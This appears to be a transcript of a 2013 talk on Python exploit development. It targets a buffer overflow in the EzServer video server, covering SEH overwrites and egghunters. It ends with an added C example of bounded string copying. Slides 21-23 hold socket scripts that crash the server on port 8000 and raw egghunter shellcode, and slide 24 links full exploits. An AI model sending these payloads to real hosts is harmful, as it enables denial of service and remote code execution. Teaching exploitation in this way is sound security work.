Exploit development: EzServer buffer overflow, by Tom Gregory

EXPLOIT DEVELOPMENT WITH PYTHON. Tom Gregory, id:python Gathering, 27 April 2013

Upload: zakiakhmad

Post on 08-May-2015


DESCRIPTION

EzServer is a video server that can stream in full HD quality to a range of machines. A buffer overflow was found in the EzServer application listening on port 8000. An attacker can send malicious code to port 8000 and gain access equivalent to the privileges of the EzServer application. In this talk, the author walks through the process of building an exploit for the EzServer application using Python. Tom Gregory: Security consultant at Spentera, Metasploit exploit developer/contributor. http://www.python.or.id/2013/04/kopi-darat-komunitas-python-indonesia.html

TRANSCRIPT

1. EXPLOIT DEVELOPMENT WITH PYTHON
   Tom Gregory, id:python Gathering, 27 April 2013

2. AGENDA
   - Memory
   - Stack/Buffer Overflow
   - Structured Exception Handler (SEH)
   - Escape from small space
   - Egghunter
   - Demo

3. PROCESS MEMORY LAYOUT
   (Diagram, from high addresses at the top of memory, 0xFFFFFFFF, down to low addresses, 0x00000000:)
   - Args./Environment
   - Stack (grows down, by procedure calls)
   - Unused memory
   - Heap (dynamic data; grows up, e.g. by malloc and new)
   - Static data (.data)
   - Program code (.text)

4. STACK BUFFER OVERFLOW

    #include <string.h>

    void foo (char *bar)
    {
        char c[12];
        strcpy(c, bar); // no bounds checking...
    }

    int main (int argc, char **argv)
    {
        foo(argv[1]);
    }

5. STACK BUFFER OVERFLOW
   (Diagram: the stack frame of foo(), from low to high memory addresses; the stack grows toward lower addresses:)
   - Unallocated stack
   - char c[12]
   - char *bar
   - Saved frame pointer (EBP)
   - Return address (EIP)
   - Parent routine's stack

6. STACK BUFFER OVERFLOW
   (Same diagram, with the string "h e l l o \0" written into char c[12].)

7. STACK BUFFER OVERFLOW
   (Same diagram, with the stack filled with A: seven rows of "A A A A" followed by the bytes "\x08 \x35 \xc0 \x80".)
   - Fill the stack with A
   - Overwritten return address at 0x80c03508
   - Little endian: 0x80c03508

8. WHAT IS SEH?
   This structure (also called a SEH record) is 8 bytes and has 2 elements (4 bytes each):
   - a pointer to the next exception_registration structure (in essence, to the next SEH record, in case the current handler is unable to handle the exception)
   - a pointer to the address of the actual code of the exception handler (SE Handler)

9. WHAT IS SEH?
   Image was taken without permission from http://images.google.com

10. LOOK AT THE SEH STRUCTURE
   Beginning of the SEH chain:
   - The SEH chain will be placed at the top of the main data block.
   - It is also called the FS:[0] chain (on Intel: mov [reg], dword ptr fs:[0]).
   End of the SEH chain:
   - Indicated by 0xFFFFFFFF.
   - Will trigger improper termination of the program.

11. HOW SEH WORKS?
   TEB: FS:[0] = 0012FF40

    Stack address   Value      Meaning
    0012FF40        0012FFB0   next SEH record
    0012FF44        7C839AD8   SE Handler
    0012FFB0        0012FFE0   next SEH record
    0012FFB4        0040109A   SE Handler
    0012FFE0        FFFFFFFF   next SEH record (end of chain)
    0012FFE4        7C839AD8   SE Handler

12. PROTECTIONS AGAINST SEH
   XOR
   - Before the exception handler is called, all registers are XORed with each other, so they all point to 0x00000000.
   DEP & Stack Cookies
   - Stack cookies (canary) are set up via C++ compiler options.
   - DEP marks the stack memory as non-executable. It was introduced with Windows XP SP2 and Windows 2003, and is enabled by default on Windows Vista and 7.
   - Those two protections make it harder to build exploits.

13. PROTECTIONS AGAINST SEH
   SafeSEH
   - Additional protection added to compilers, helping to stop the abuse of SEH overwrites.
   - It checks the original value of the SEH; if it is overwritten, SafeSEH will try to bring it back to the original value.

14. ABUSING SEH
   On the direct RET technique: simply find an instruction to jump to the stack, done.
   On SEH based:
   - You cannot simply jump to the stack, because the registers are XORed.
   - We can take advantage of this exception handling condition by overwriting the SE Handler address.
   - The OS will know the exception handling routine, and pass it to the next SEH record.
   - The pointer to the next SEH will bring us to the shellcode. Game over!

15. ABUSING SEH
   In other words, the payload must do the following things:
   - Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won't kick in.
   - Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode).
   - Overwrite the SE handler with a pointer to an instruction that will bring you back to the next SEH and execute the jumpcode.
   - The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten pointer to the next SEH record will jump to it.

16. ABUSING SEH
   When the exception occurs, the stack looks like this (diagram: top of stack at the top, our pointer to the next SEH address further down).
   Possible values to overwrite the SE Handler with are POP something, POP something and RETN to the stack. It will POP the address that sits at the top of the stack, POP again to take the second address, and RETN to execute the third address (which is now at the top of the stack).

17. ABUSING SEH
   Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan).

18. ESCAPE FROM SMALL SPACE
   - Use Egghunter
   - Staged shellcode: use a small amount of custom shellcode to find the actual bigger shellcode (the egg), by searching the entire memory for the final shellcode.

19. EGGHUNTER
   There are 3 conditions that are important in order for this technique to work:
   - We must be able to jump to (jmp, call, push/ret) and execute some shellcode, the egghunter.
   - The final shellcode must be available somewhere in memory (stack/heap/...).
   - You must tag or prepend the final shellcode with a unique string/marker/tag. This means that we will have to define the marker in the egghunter code, and also write it just in front of the actual shellcode.

20. ENOUGH TALKING!

21. 1ST SKELETON EXPLOIT: CRASH IT!

    #!/usr/bin/python
    from socket import *

    junk = "\x41" * 10000              # 10000 bytes of "A"
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("x.x.x.x", 8000))       # x.x.x.x: address of the EzServer host
    print "[+] Launching attack.."
    s.send("GET /" + junk + " HTTP/1.0\r\n\r\n\r\n")
    s.close()

22. 2ND SKELETON EXPLOIT: EIP OVERWRITE

    #!/usr/bin/python
    from socket import *

    junk = ...                         # [random data generated from msf]
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("x.x.x.x", 8000))       # x.x.x.x: address of the EzServer host
    print "[+] Launching attack.."
    s.send("GET /" + junk + " HTTP/1.0\r\n\r\n\r\n")
    s.close()

23. 3RD SKELETON EXPLOIT: SMALL SPACE
   Egghunter:

    egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
                 "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

24. 4TH FINAL EXPLOIT
   - Exploit DB: http://www.exploit-db.com/exploits/19266/
   - Metasploit: http://www.exploit-db.com/exploits/19291/
   - http://www.metasploit.com/modules/exploit/windows/http/ezserver_http

25. [email protected]
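The strcpy() routine from slides 4-7 placed beside a bounded version, as an added C example that is not part of the deck; the names foo_vulnerable, copy_bounded, foo_safe and the BUF_LEN macro are my own, and BUF_LEN mirrors the deck's char c[12].

```c
/* Added example (not from the deck): the deck's foo() beside a bounded
 * version. Build with the hardening the deck calls "stack cookies":
 *   gcc -O2 -fstack-protector-strong overflow_demo.c                */
#include <stdio.h>
#include <string.h>

#define BUF_LEN 12   /* same size as the deck's char c[12] */

/* The deck's vulnerable routine: strcpy() stops at the NUL of bar, not at
 * the end of c, so 12 or more bytes run past c into the saved EBP and the
 * return address shown on slides 5-7. */
void foo_vulnerable(char *bar)
{
    char c[BUF_LEN];
    strcpy(c, bar); /* no bounds checking... */
}

/* Bounded variant: copy only when the string plus its NUL fits in dst.
 * Returns 0 on success, -1 when the input would have overflowed dst. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_size)        /* >= leaves the last byte for the NUL */
        return -1;
    memcpy(dst, src, n + 1);  /* n + 1 copies the terminator as well */
    return 0;
}

/* foo() rewritten on top of copy_bounded(): returns the length copied,
 * or -1 when the argument is rejected instead of smashing the frame.
 * The longest argument accepted is BUF_LEN - 1 = 11 characters. */
int foo_safe(const char *bar)
{
    char c[BUF_LEN];
    if (copy_bounded(c, sizeof c, bar) != 0)
        return -1;
    return (int)strlen(c);
}

int main(int argc, char **argv)
{
    const char *arg = argc > 1 ? argv[1] : "hello";
    if (foo_safe(arg) < 0)
        printf("rejected: %zu bytes do not fit in %d\n", strlen(arg), BUF_LEN);
    else
        printf("copied %zu bytes safely\n", strlen(arg));
    return 0;
}
```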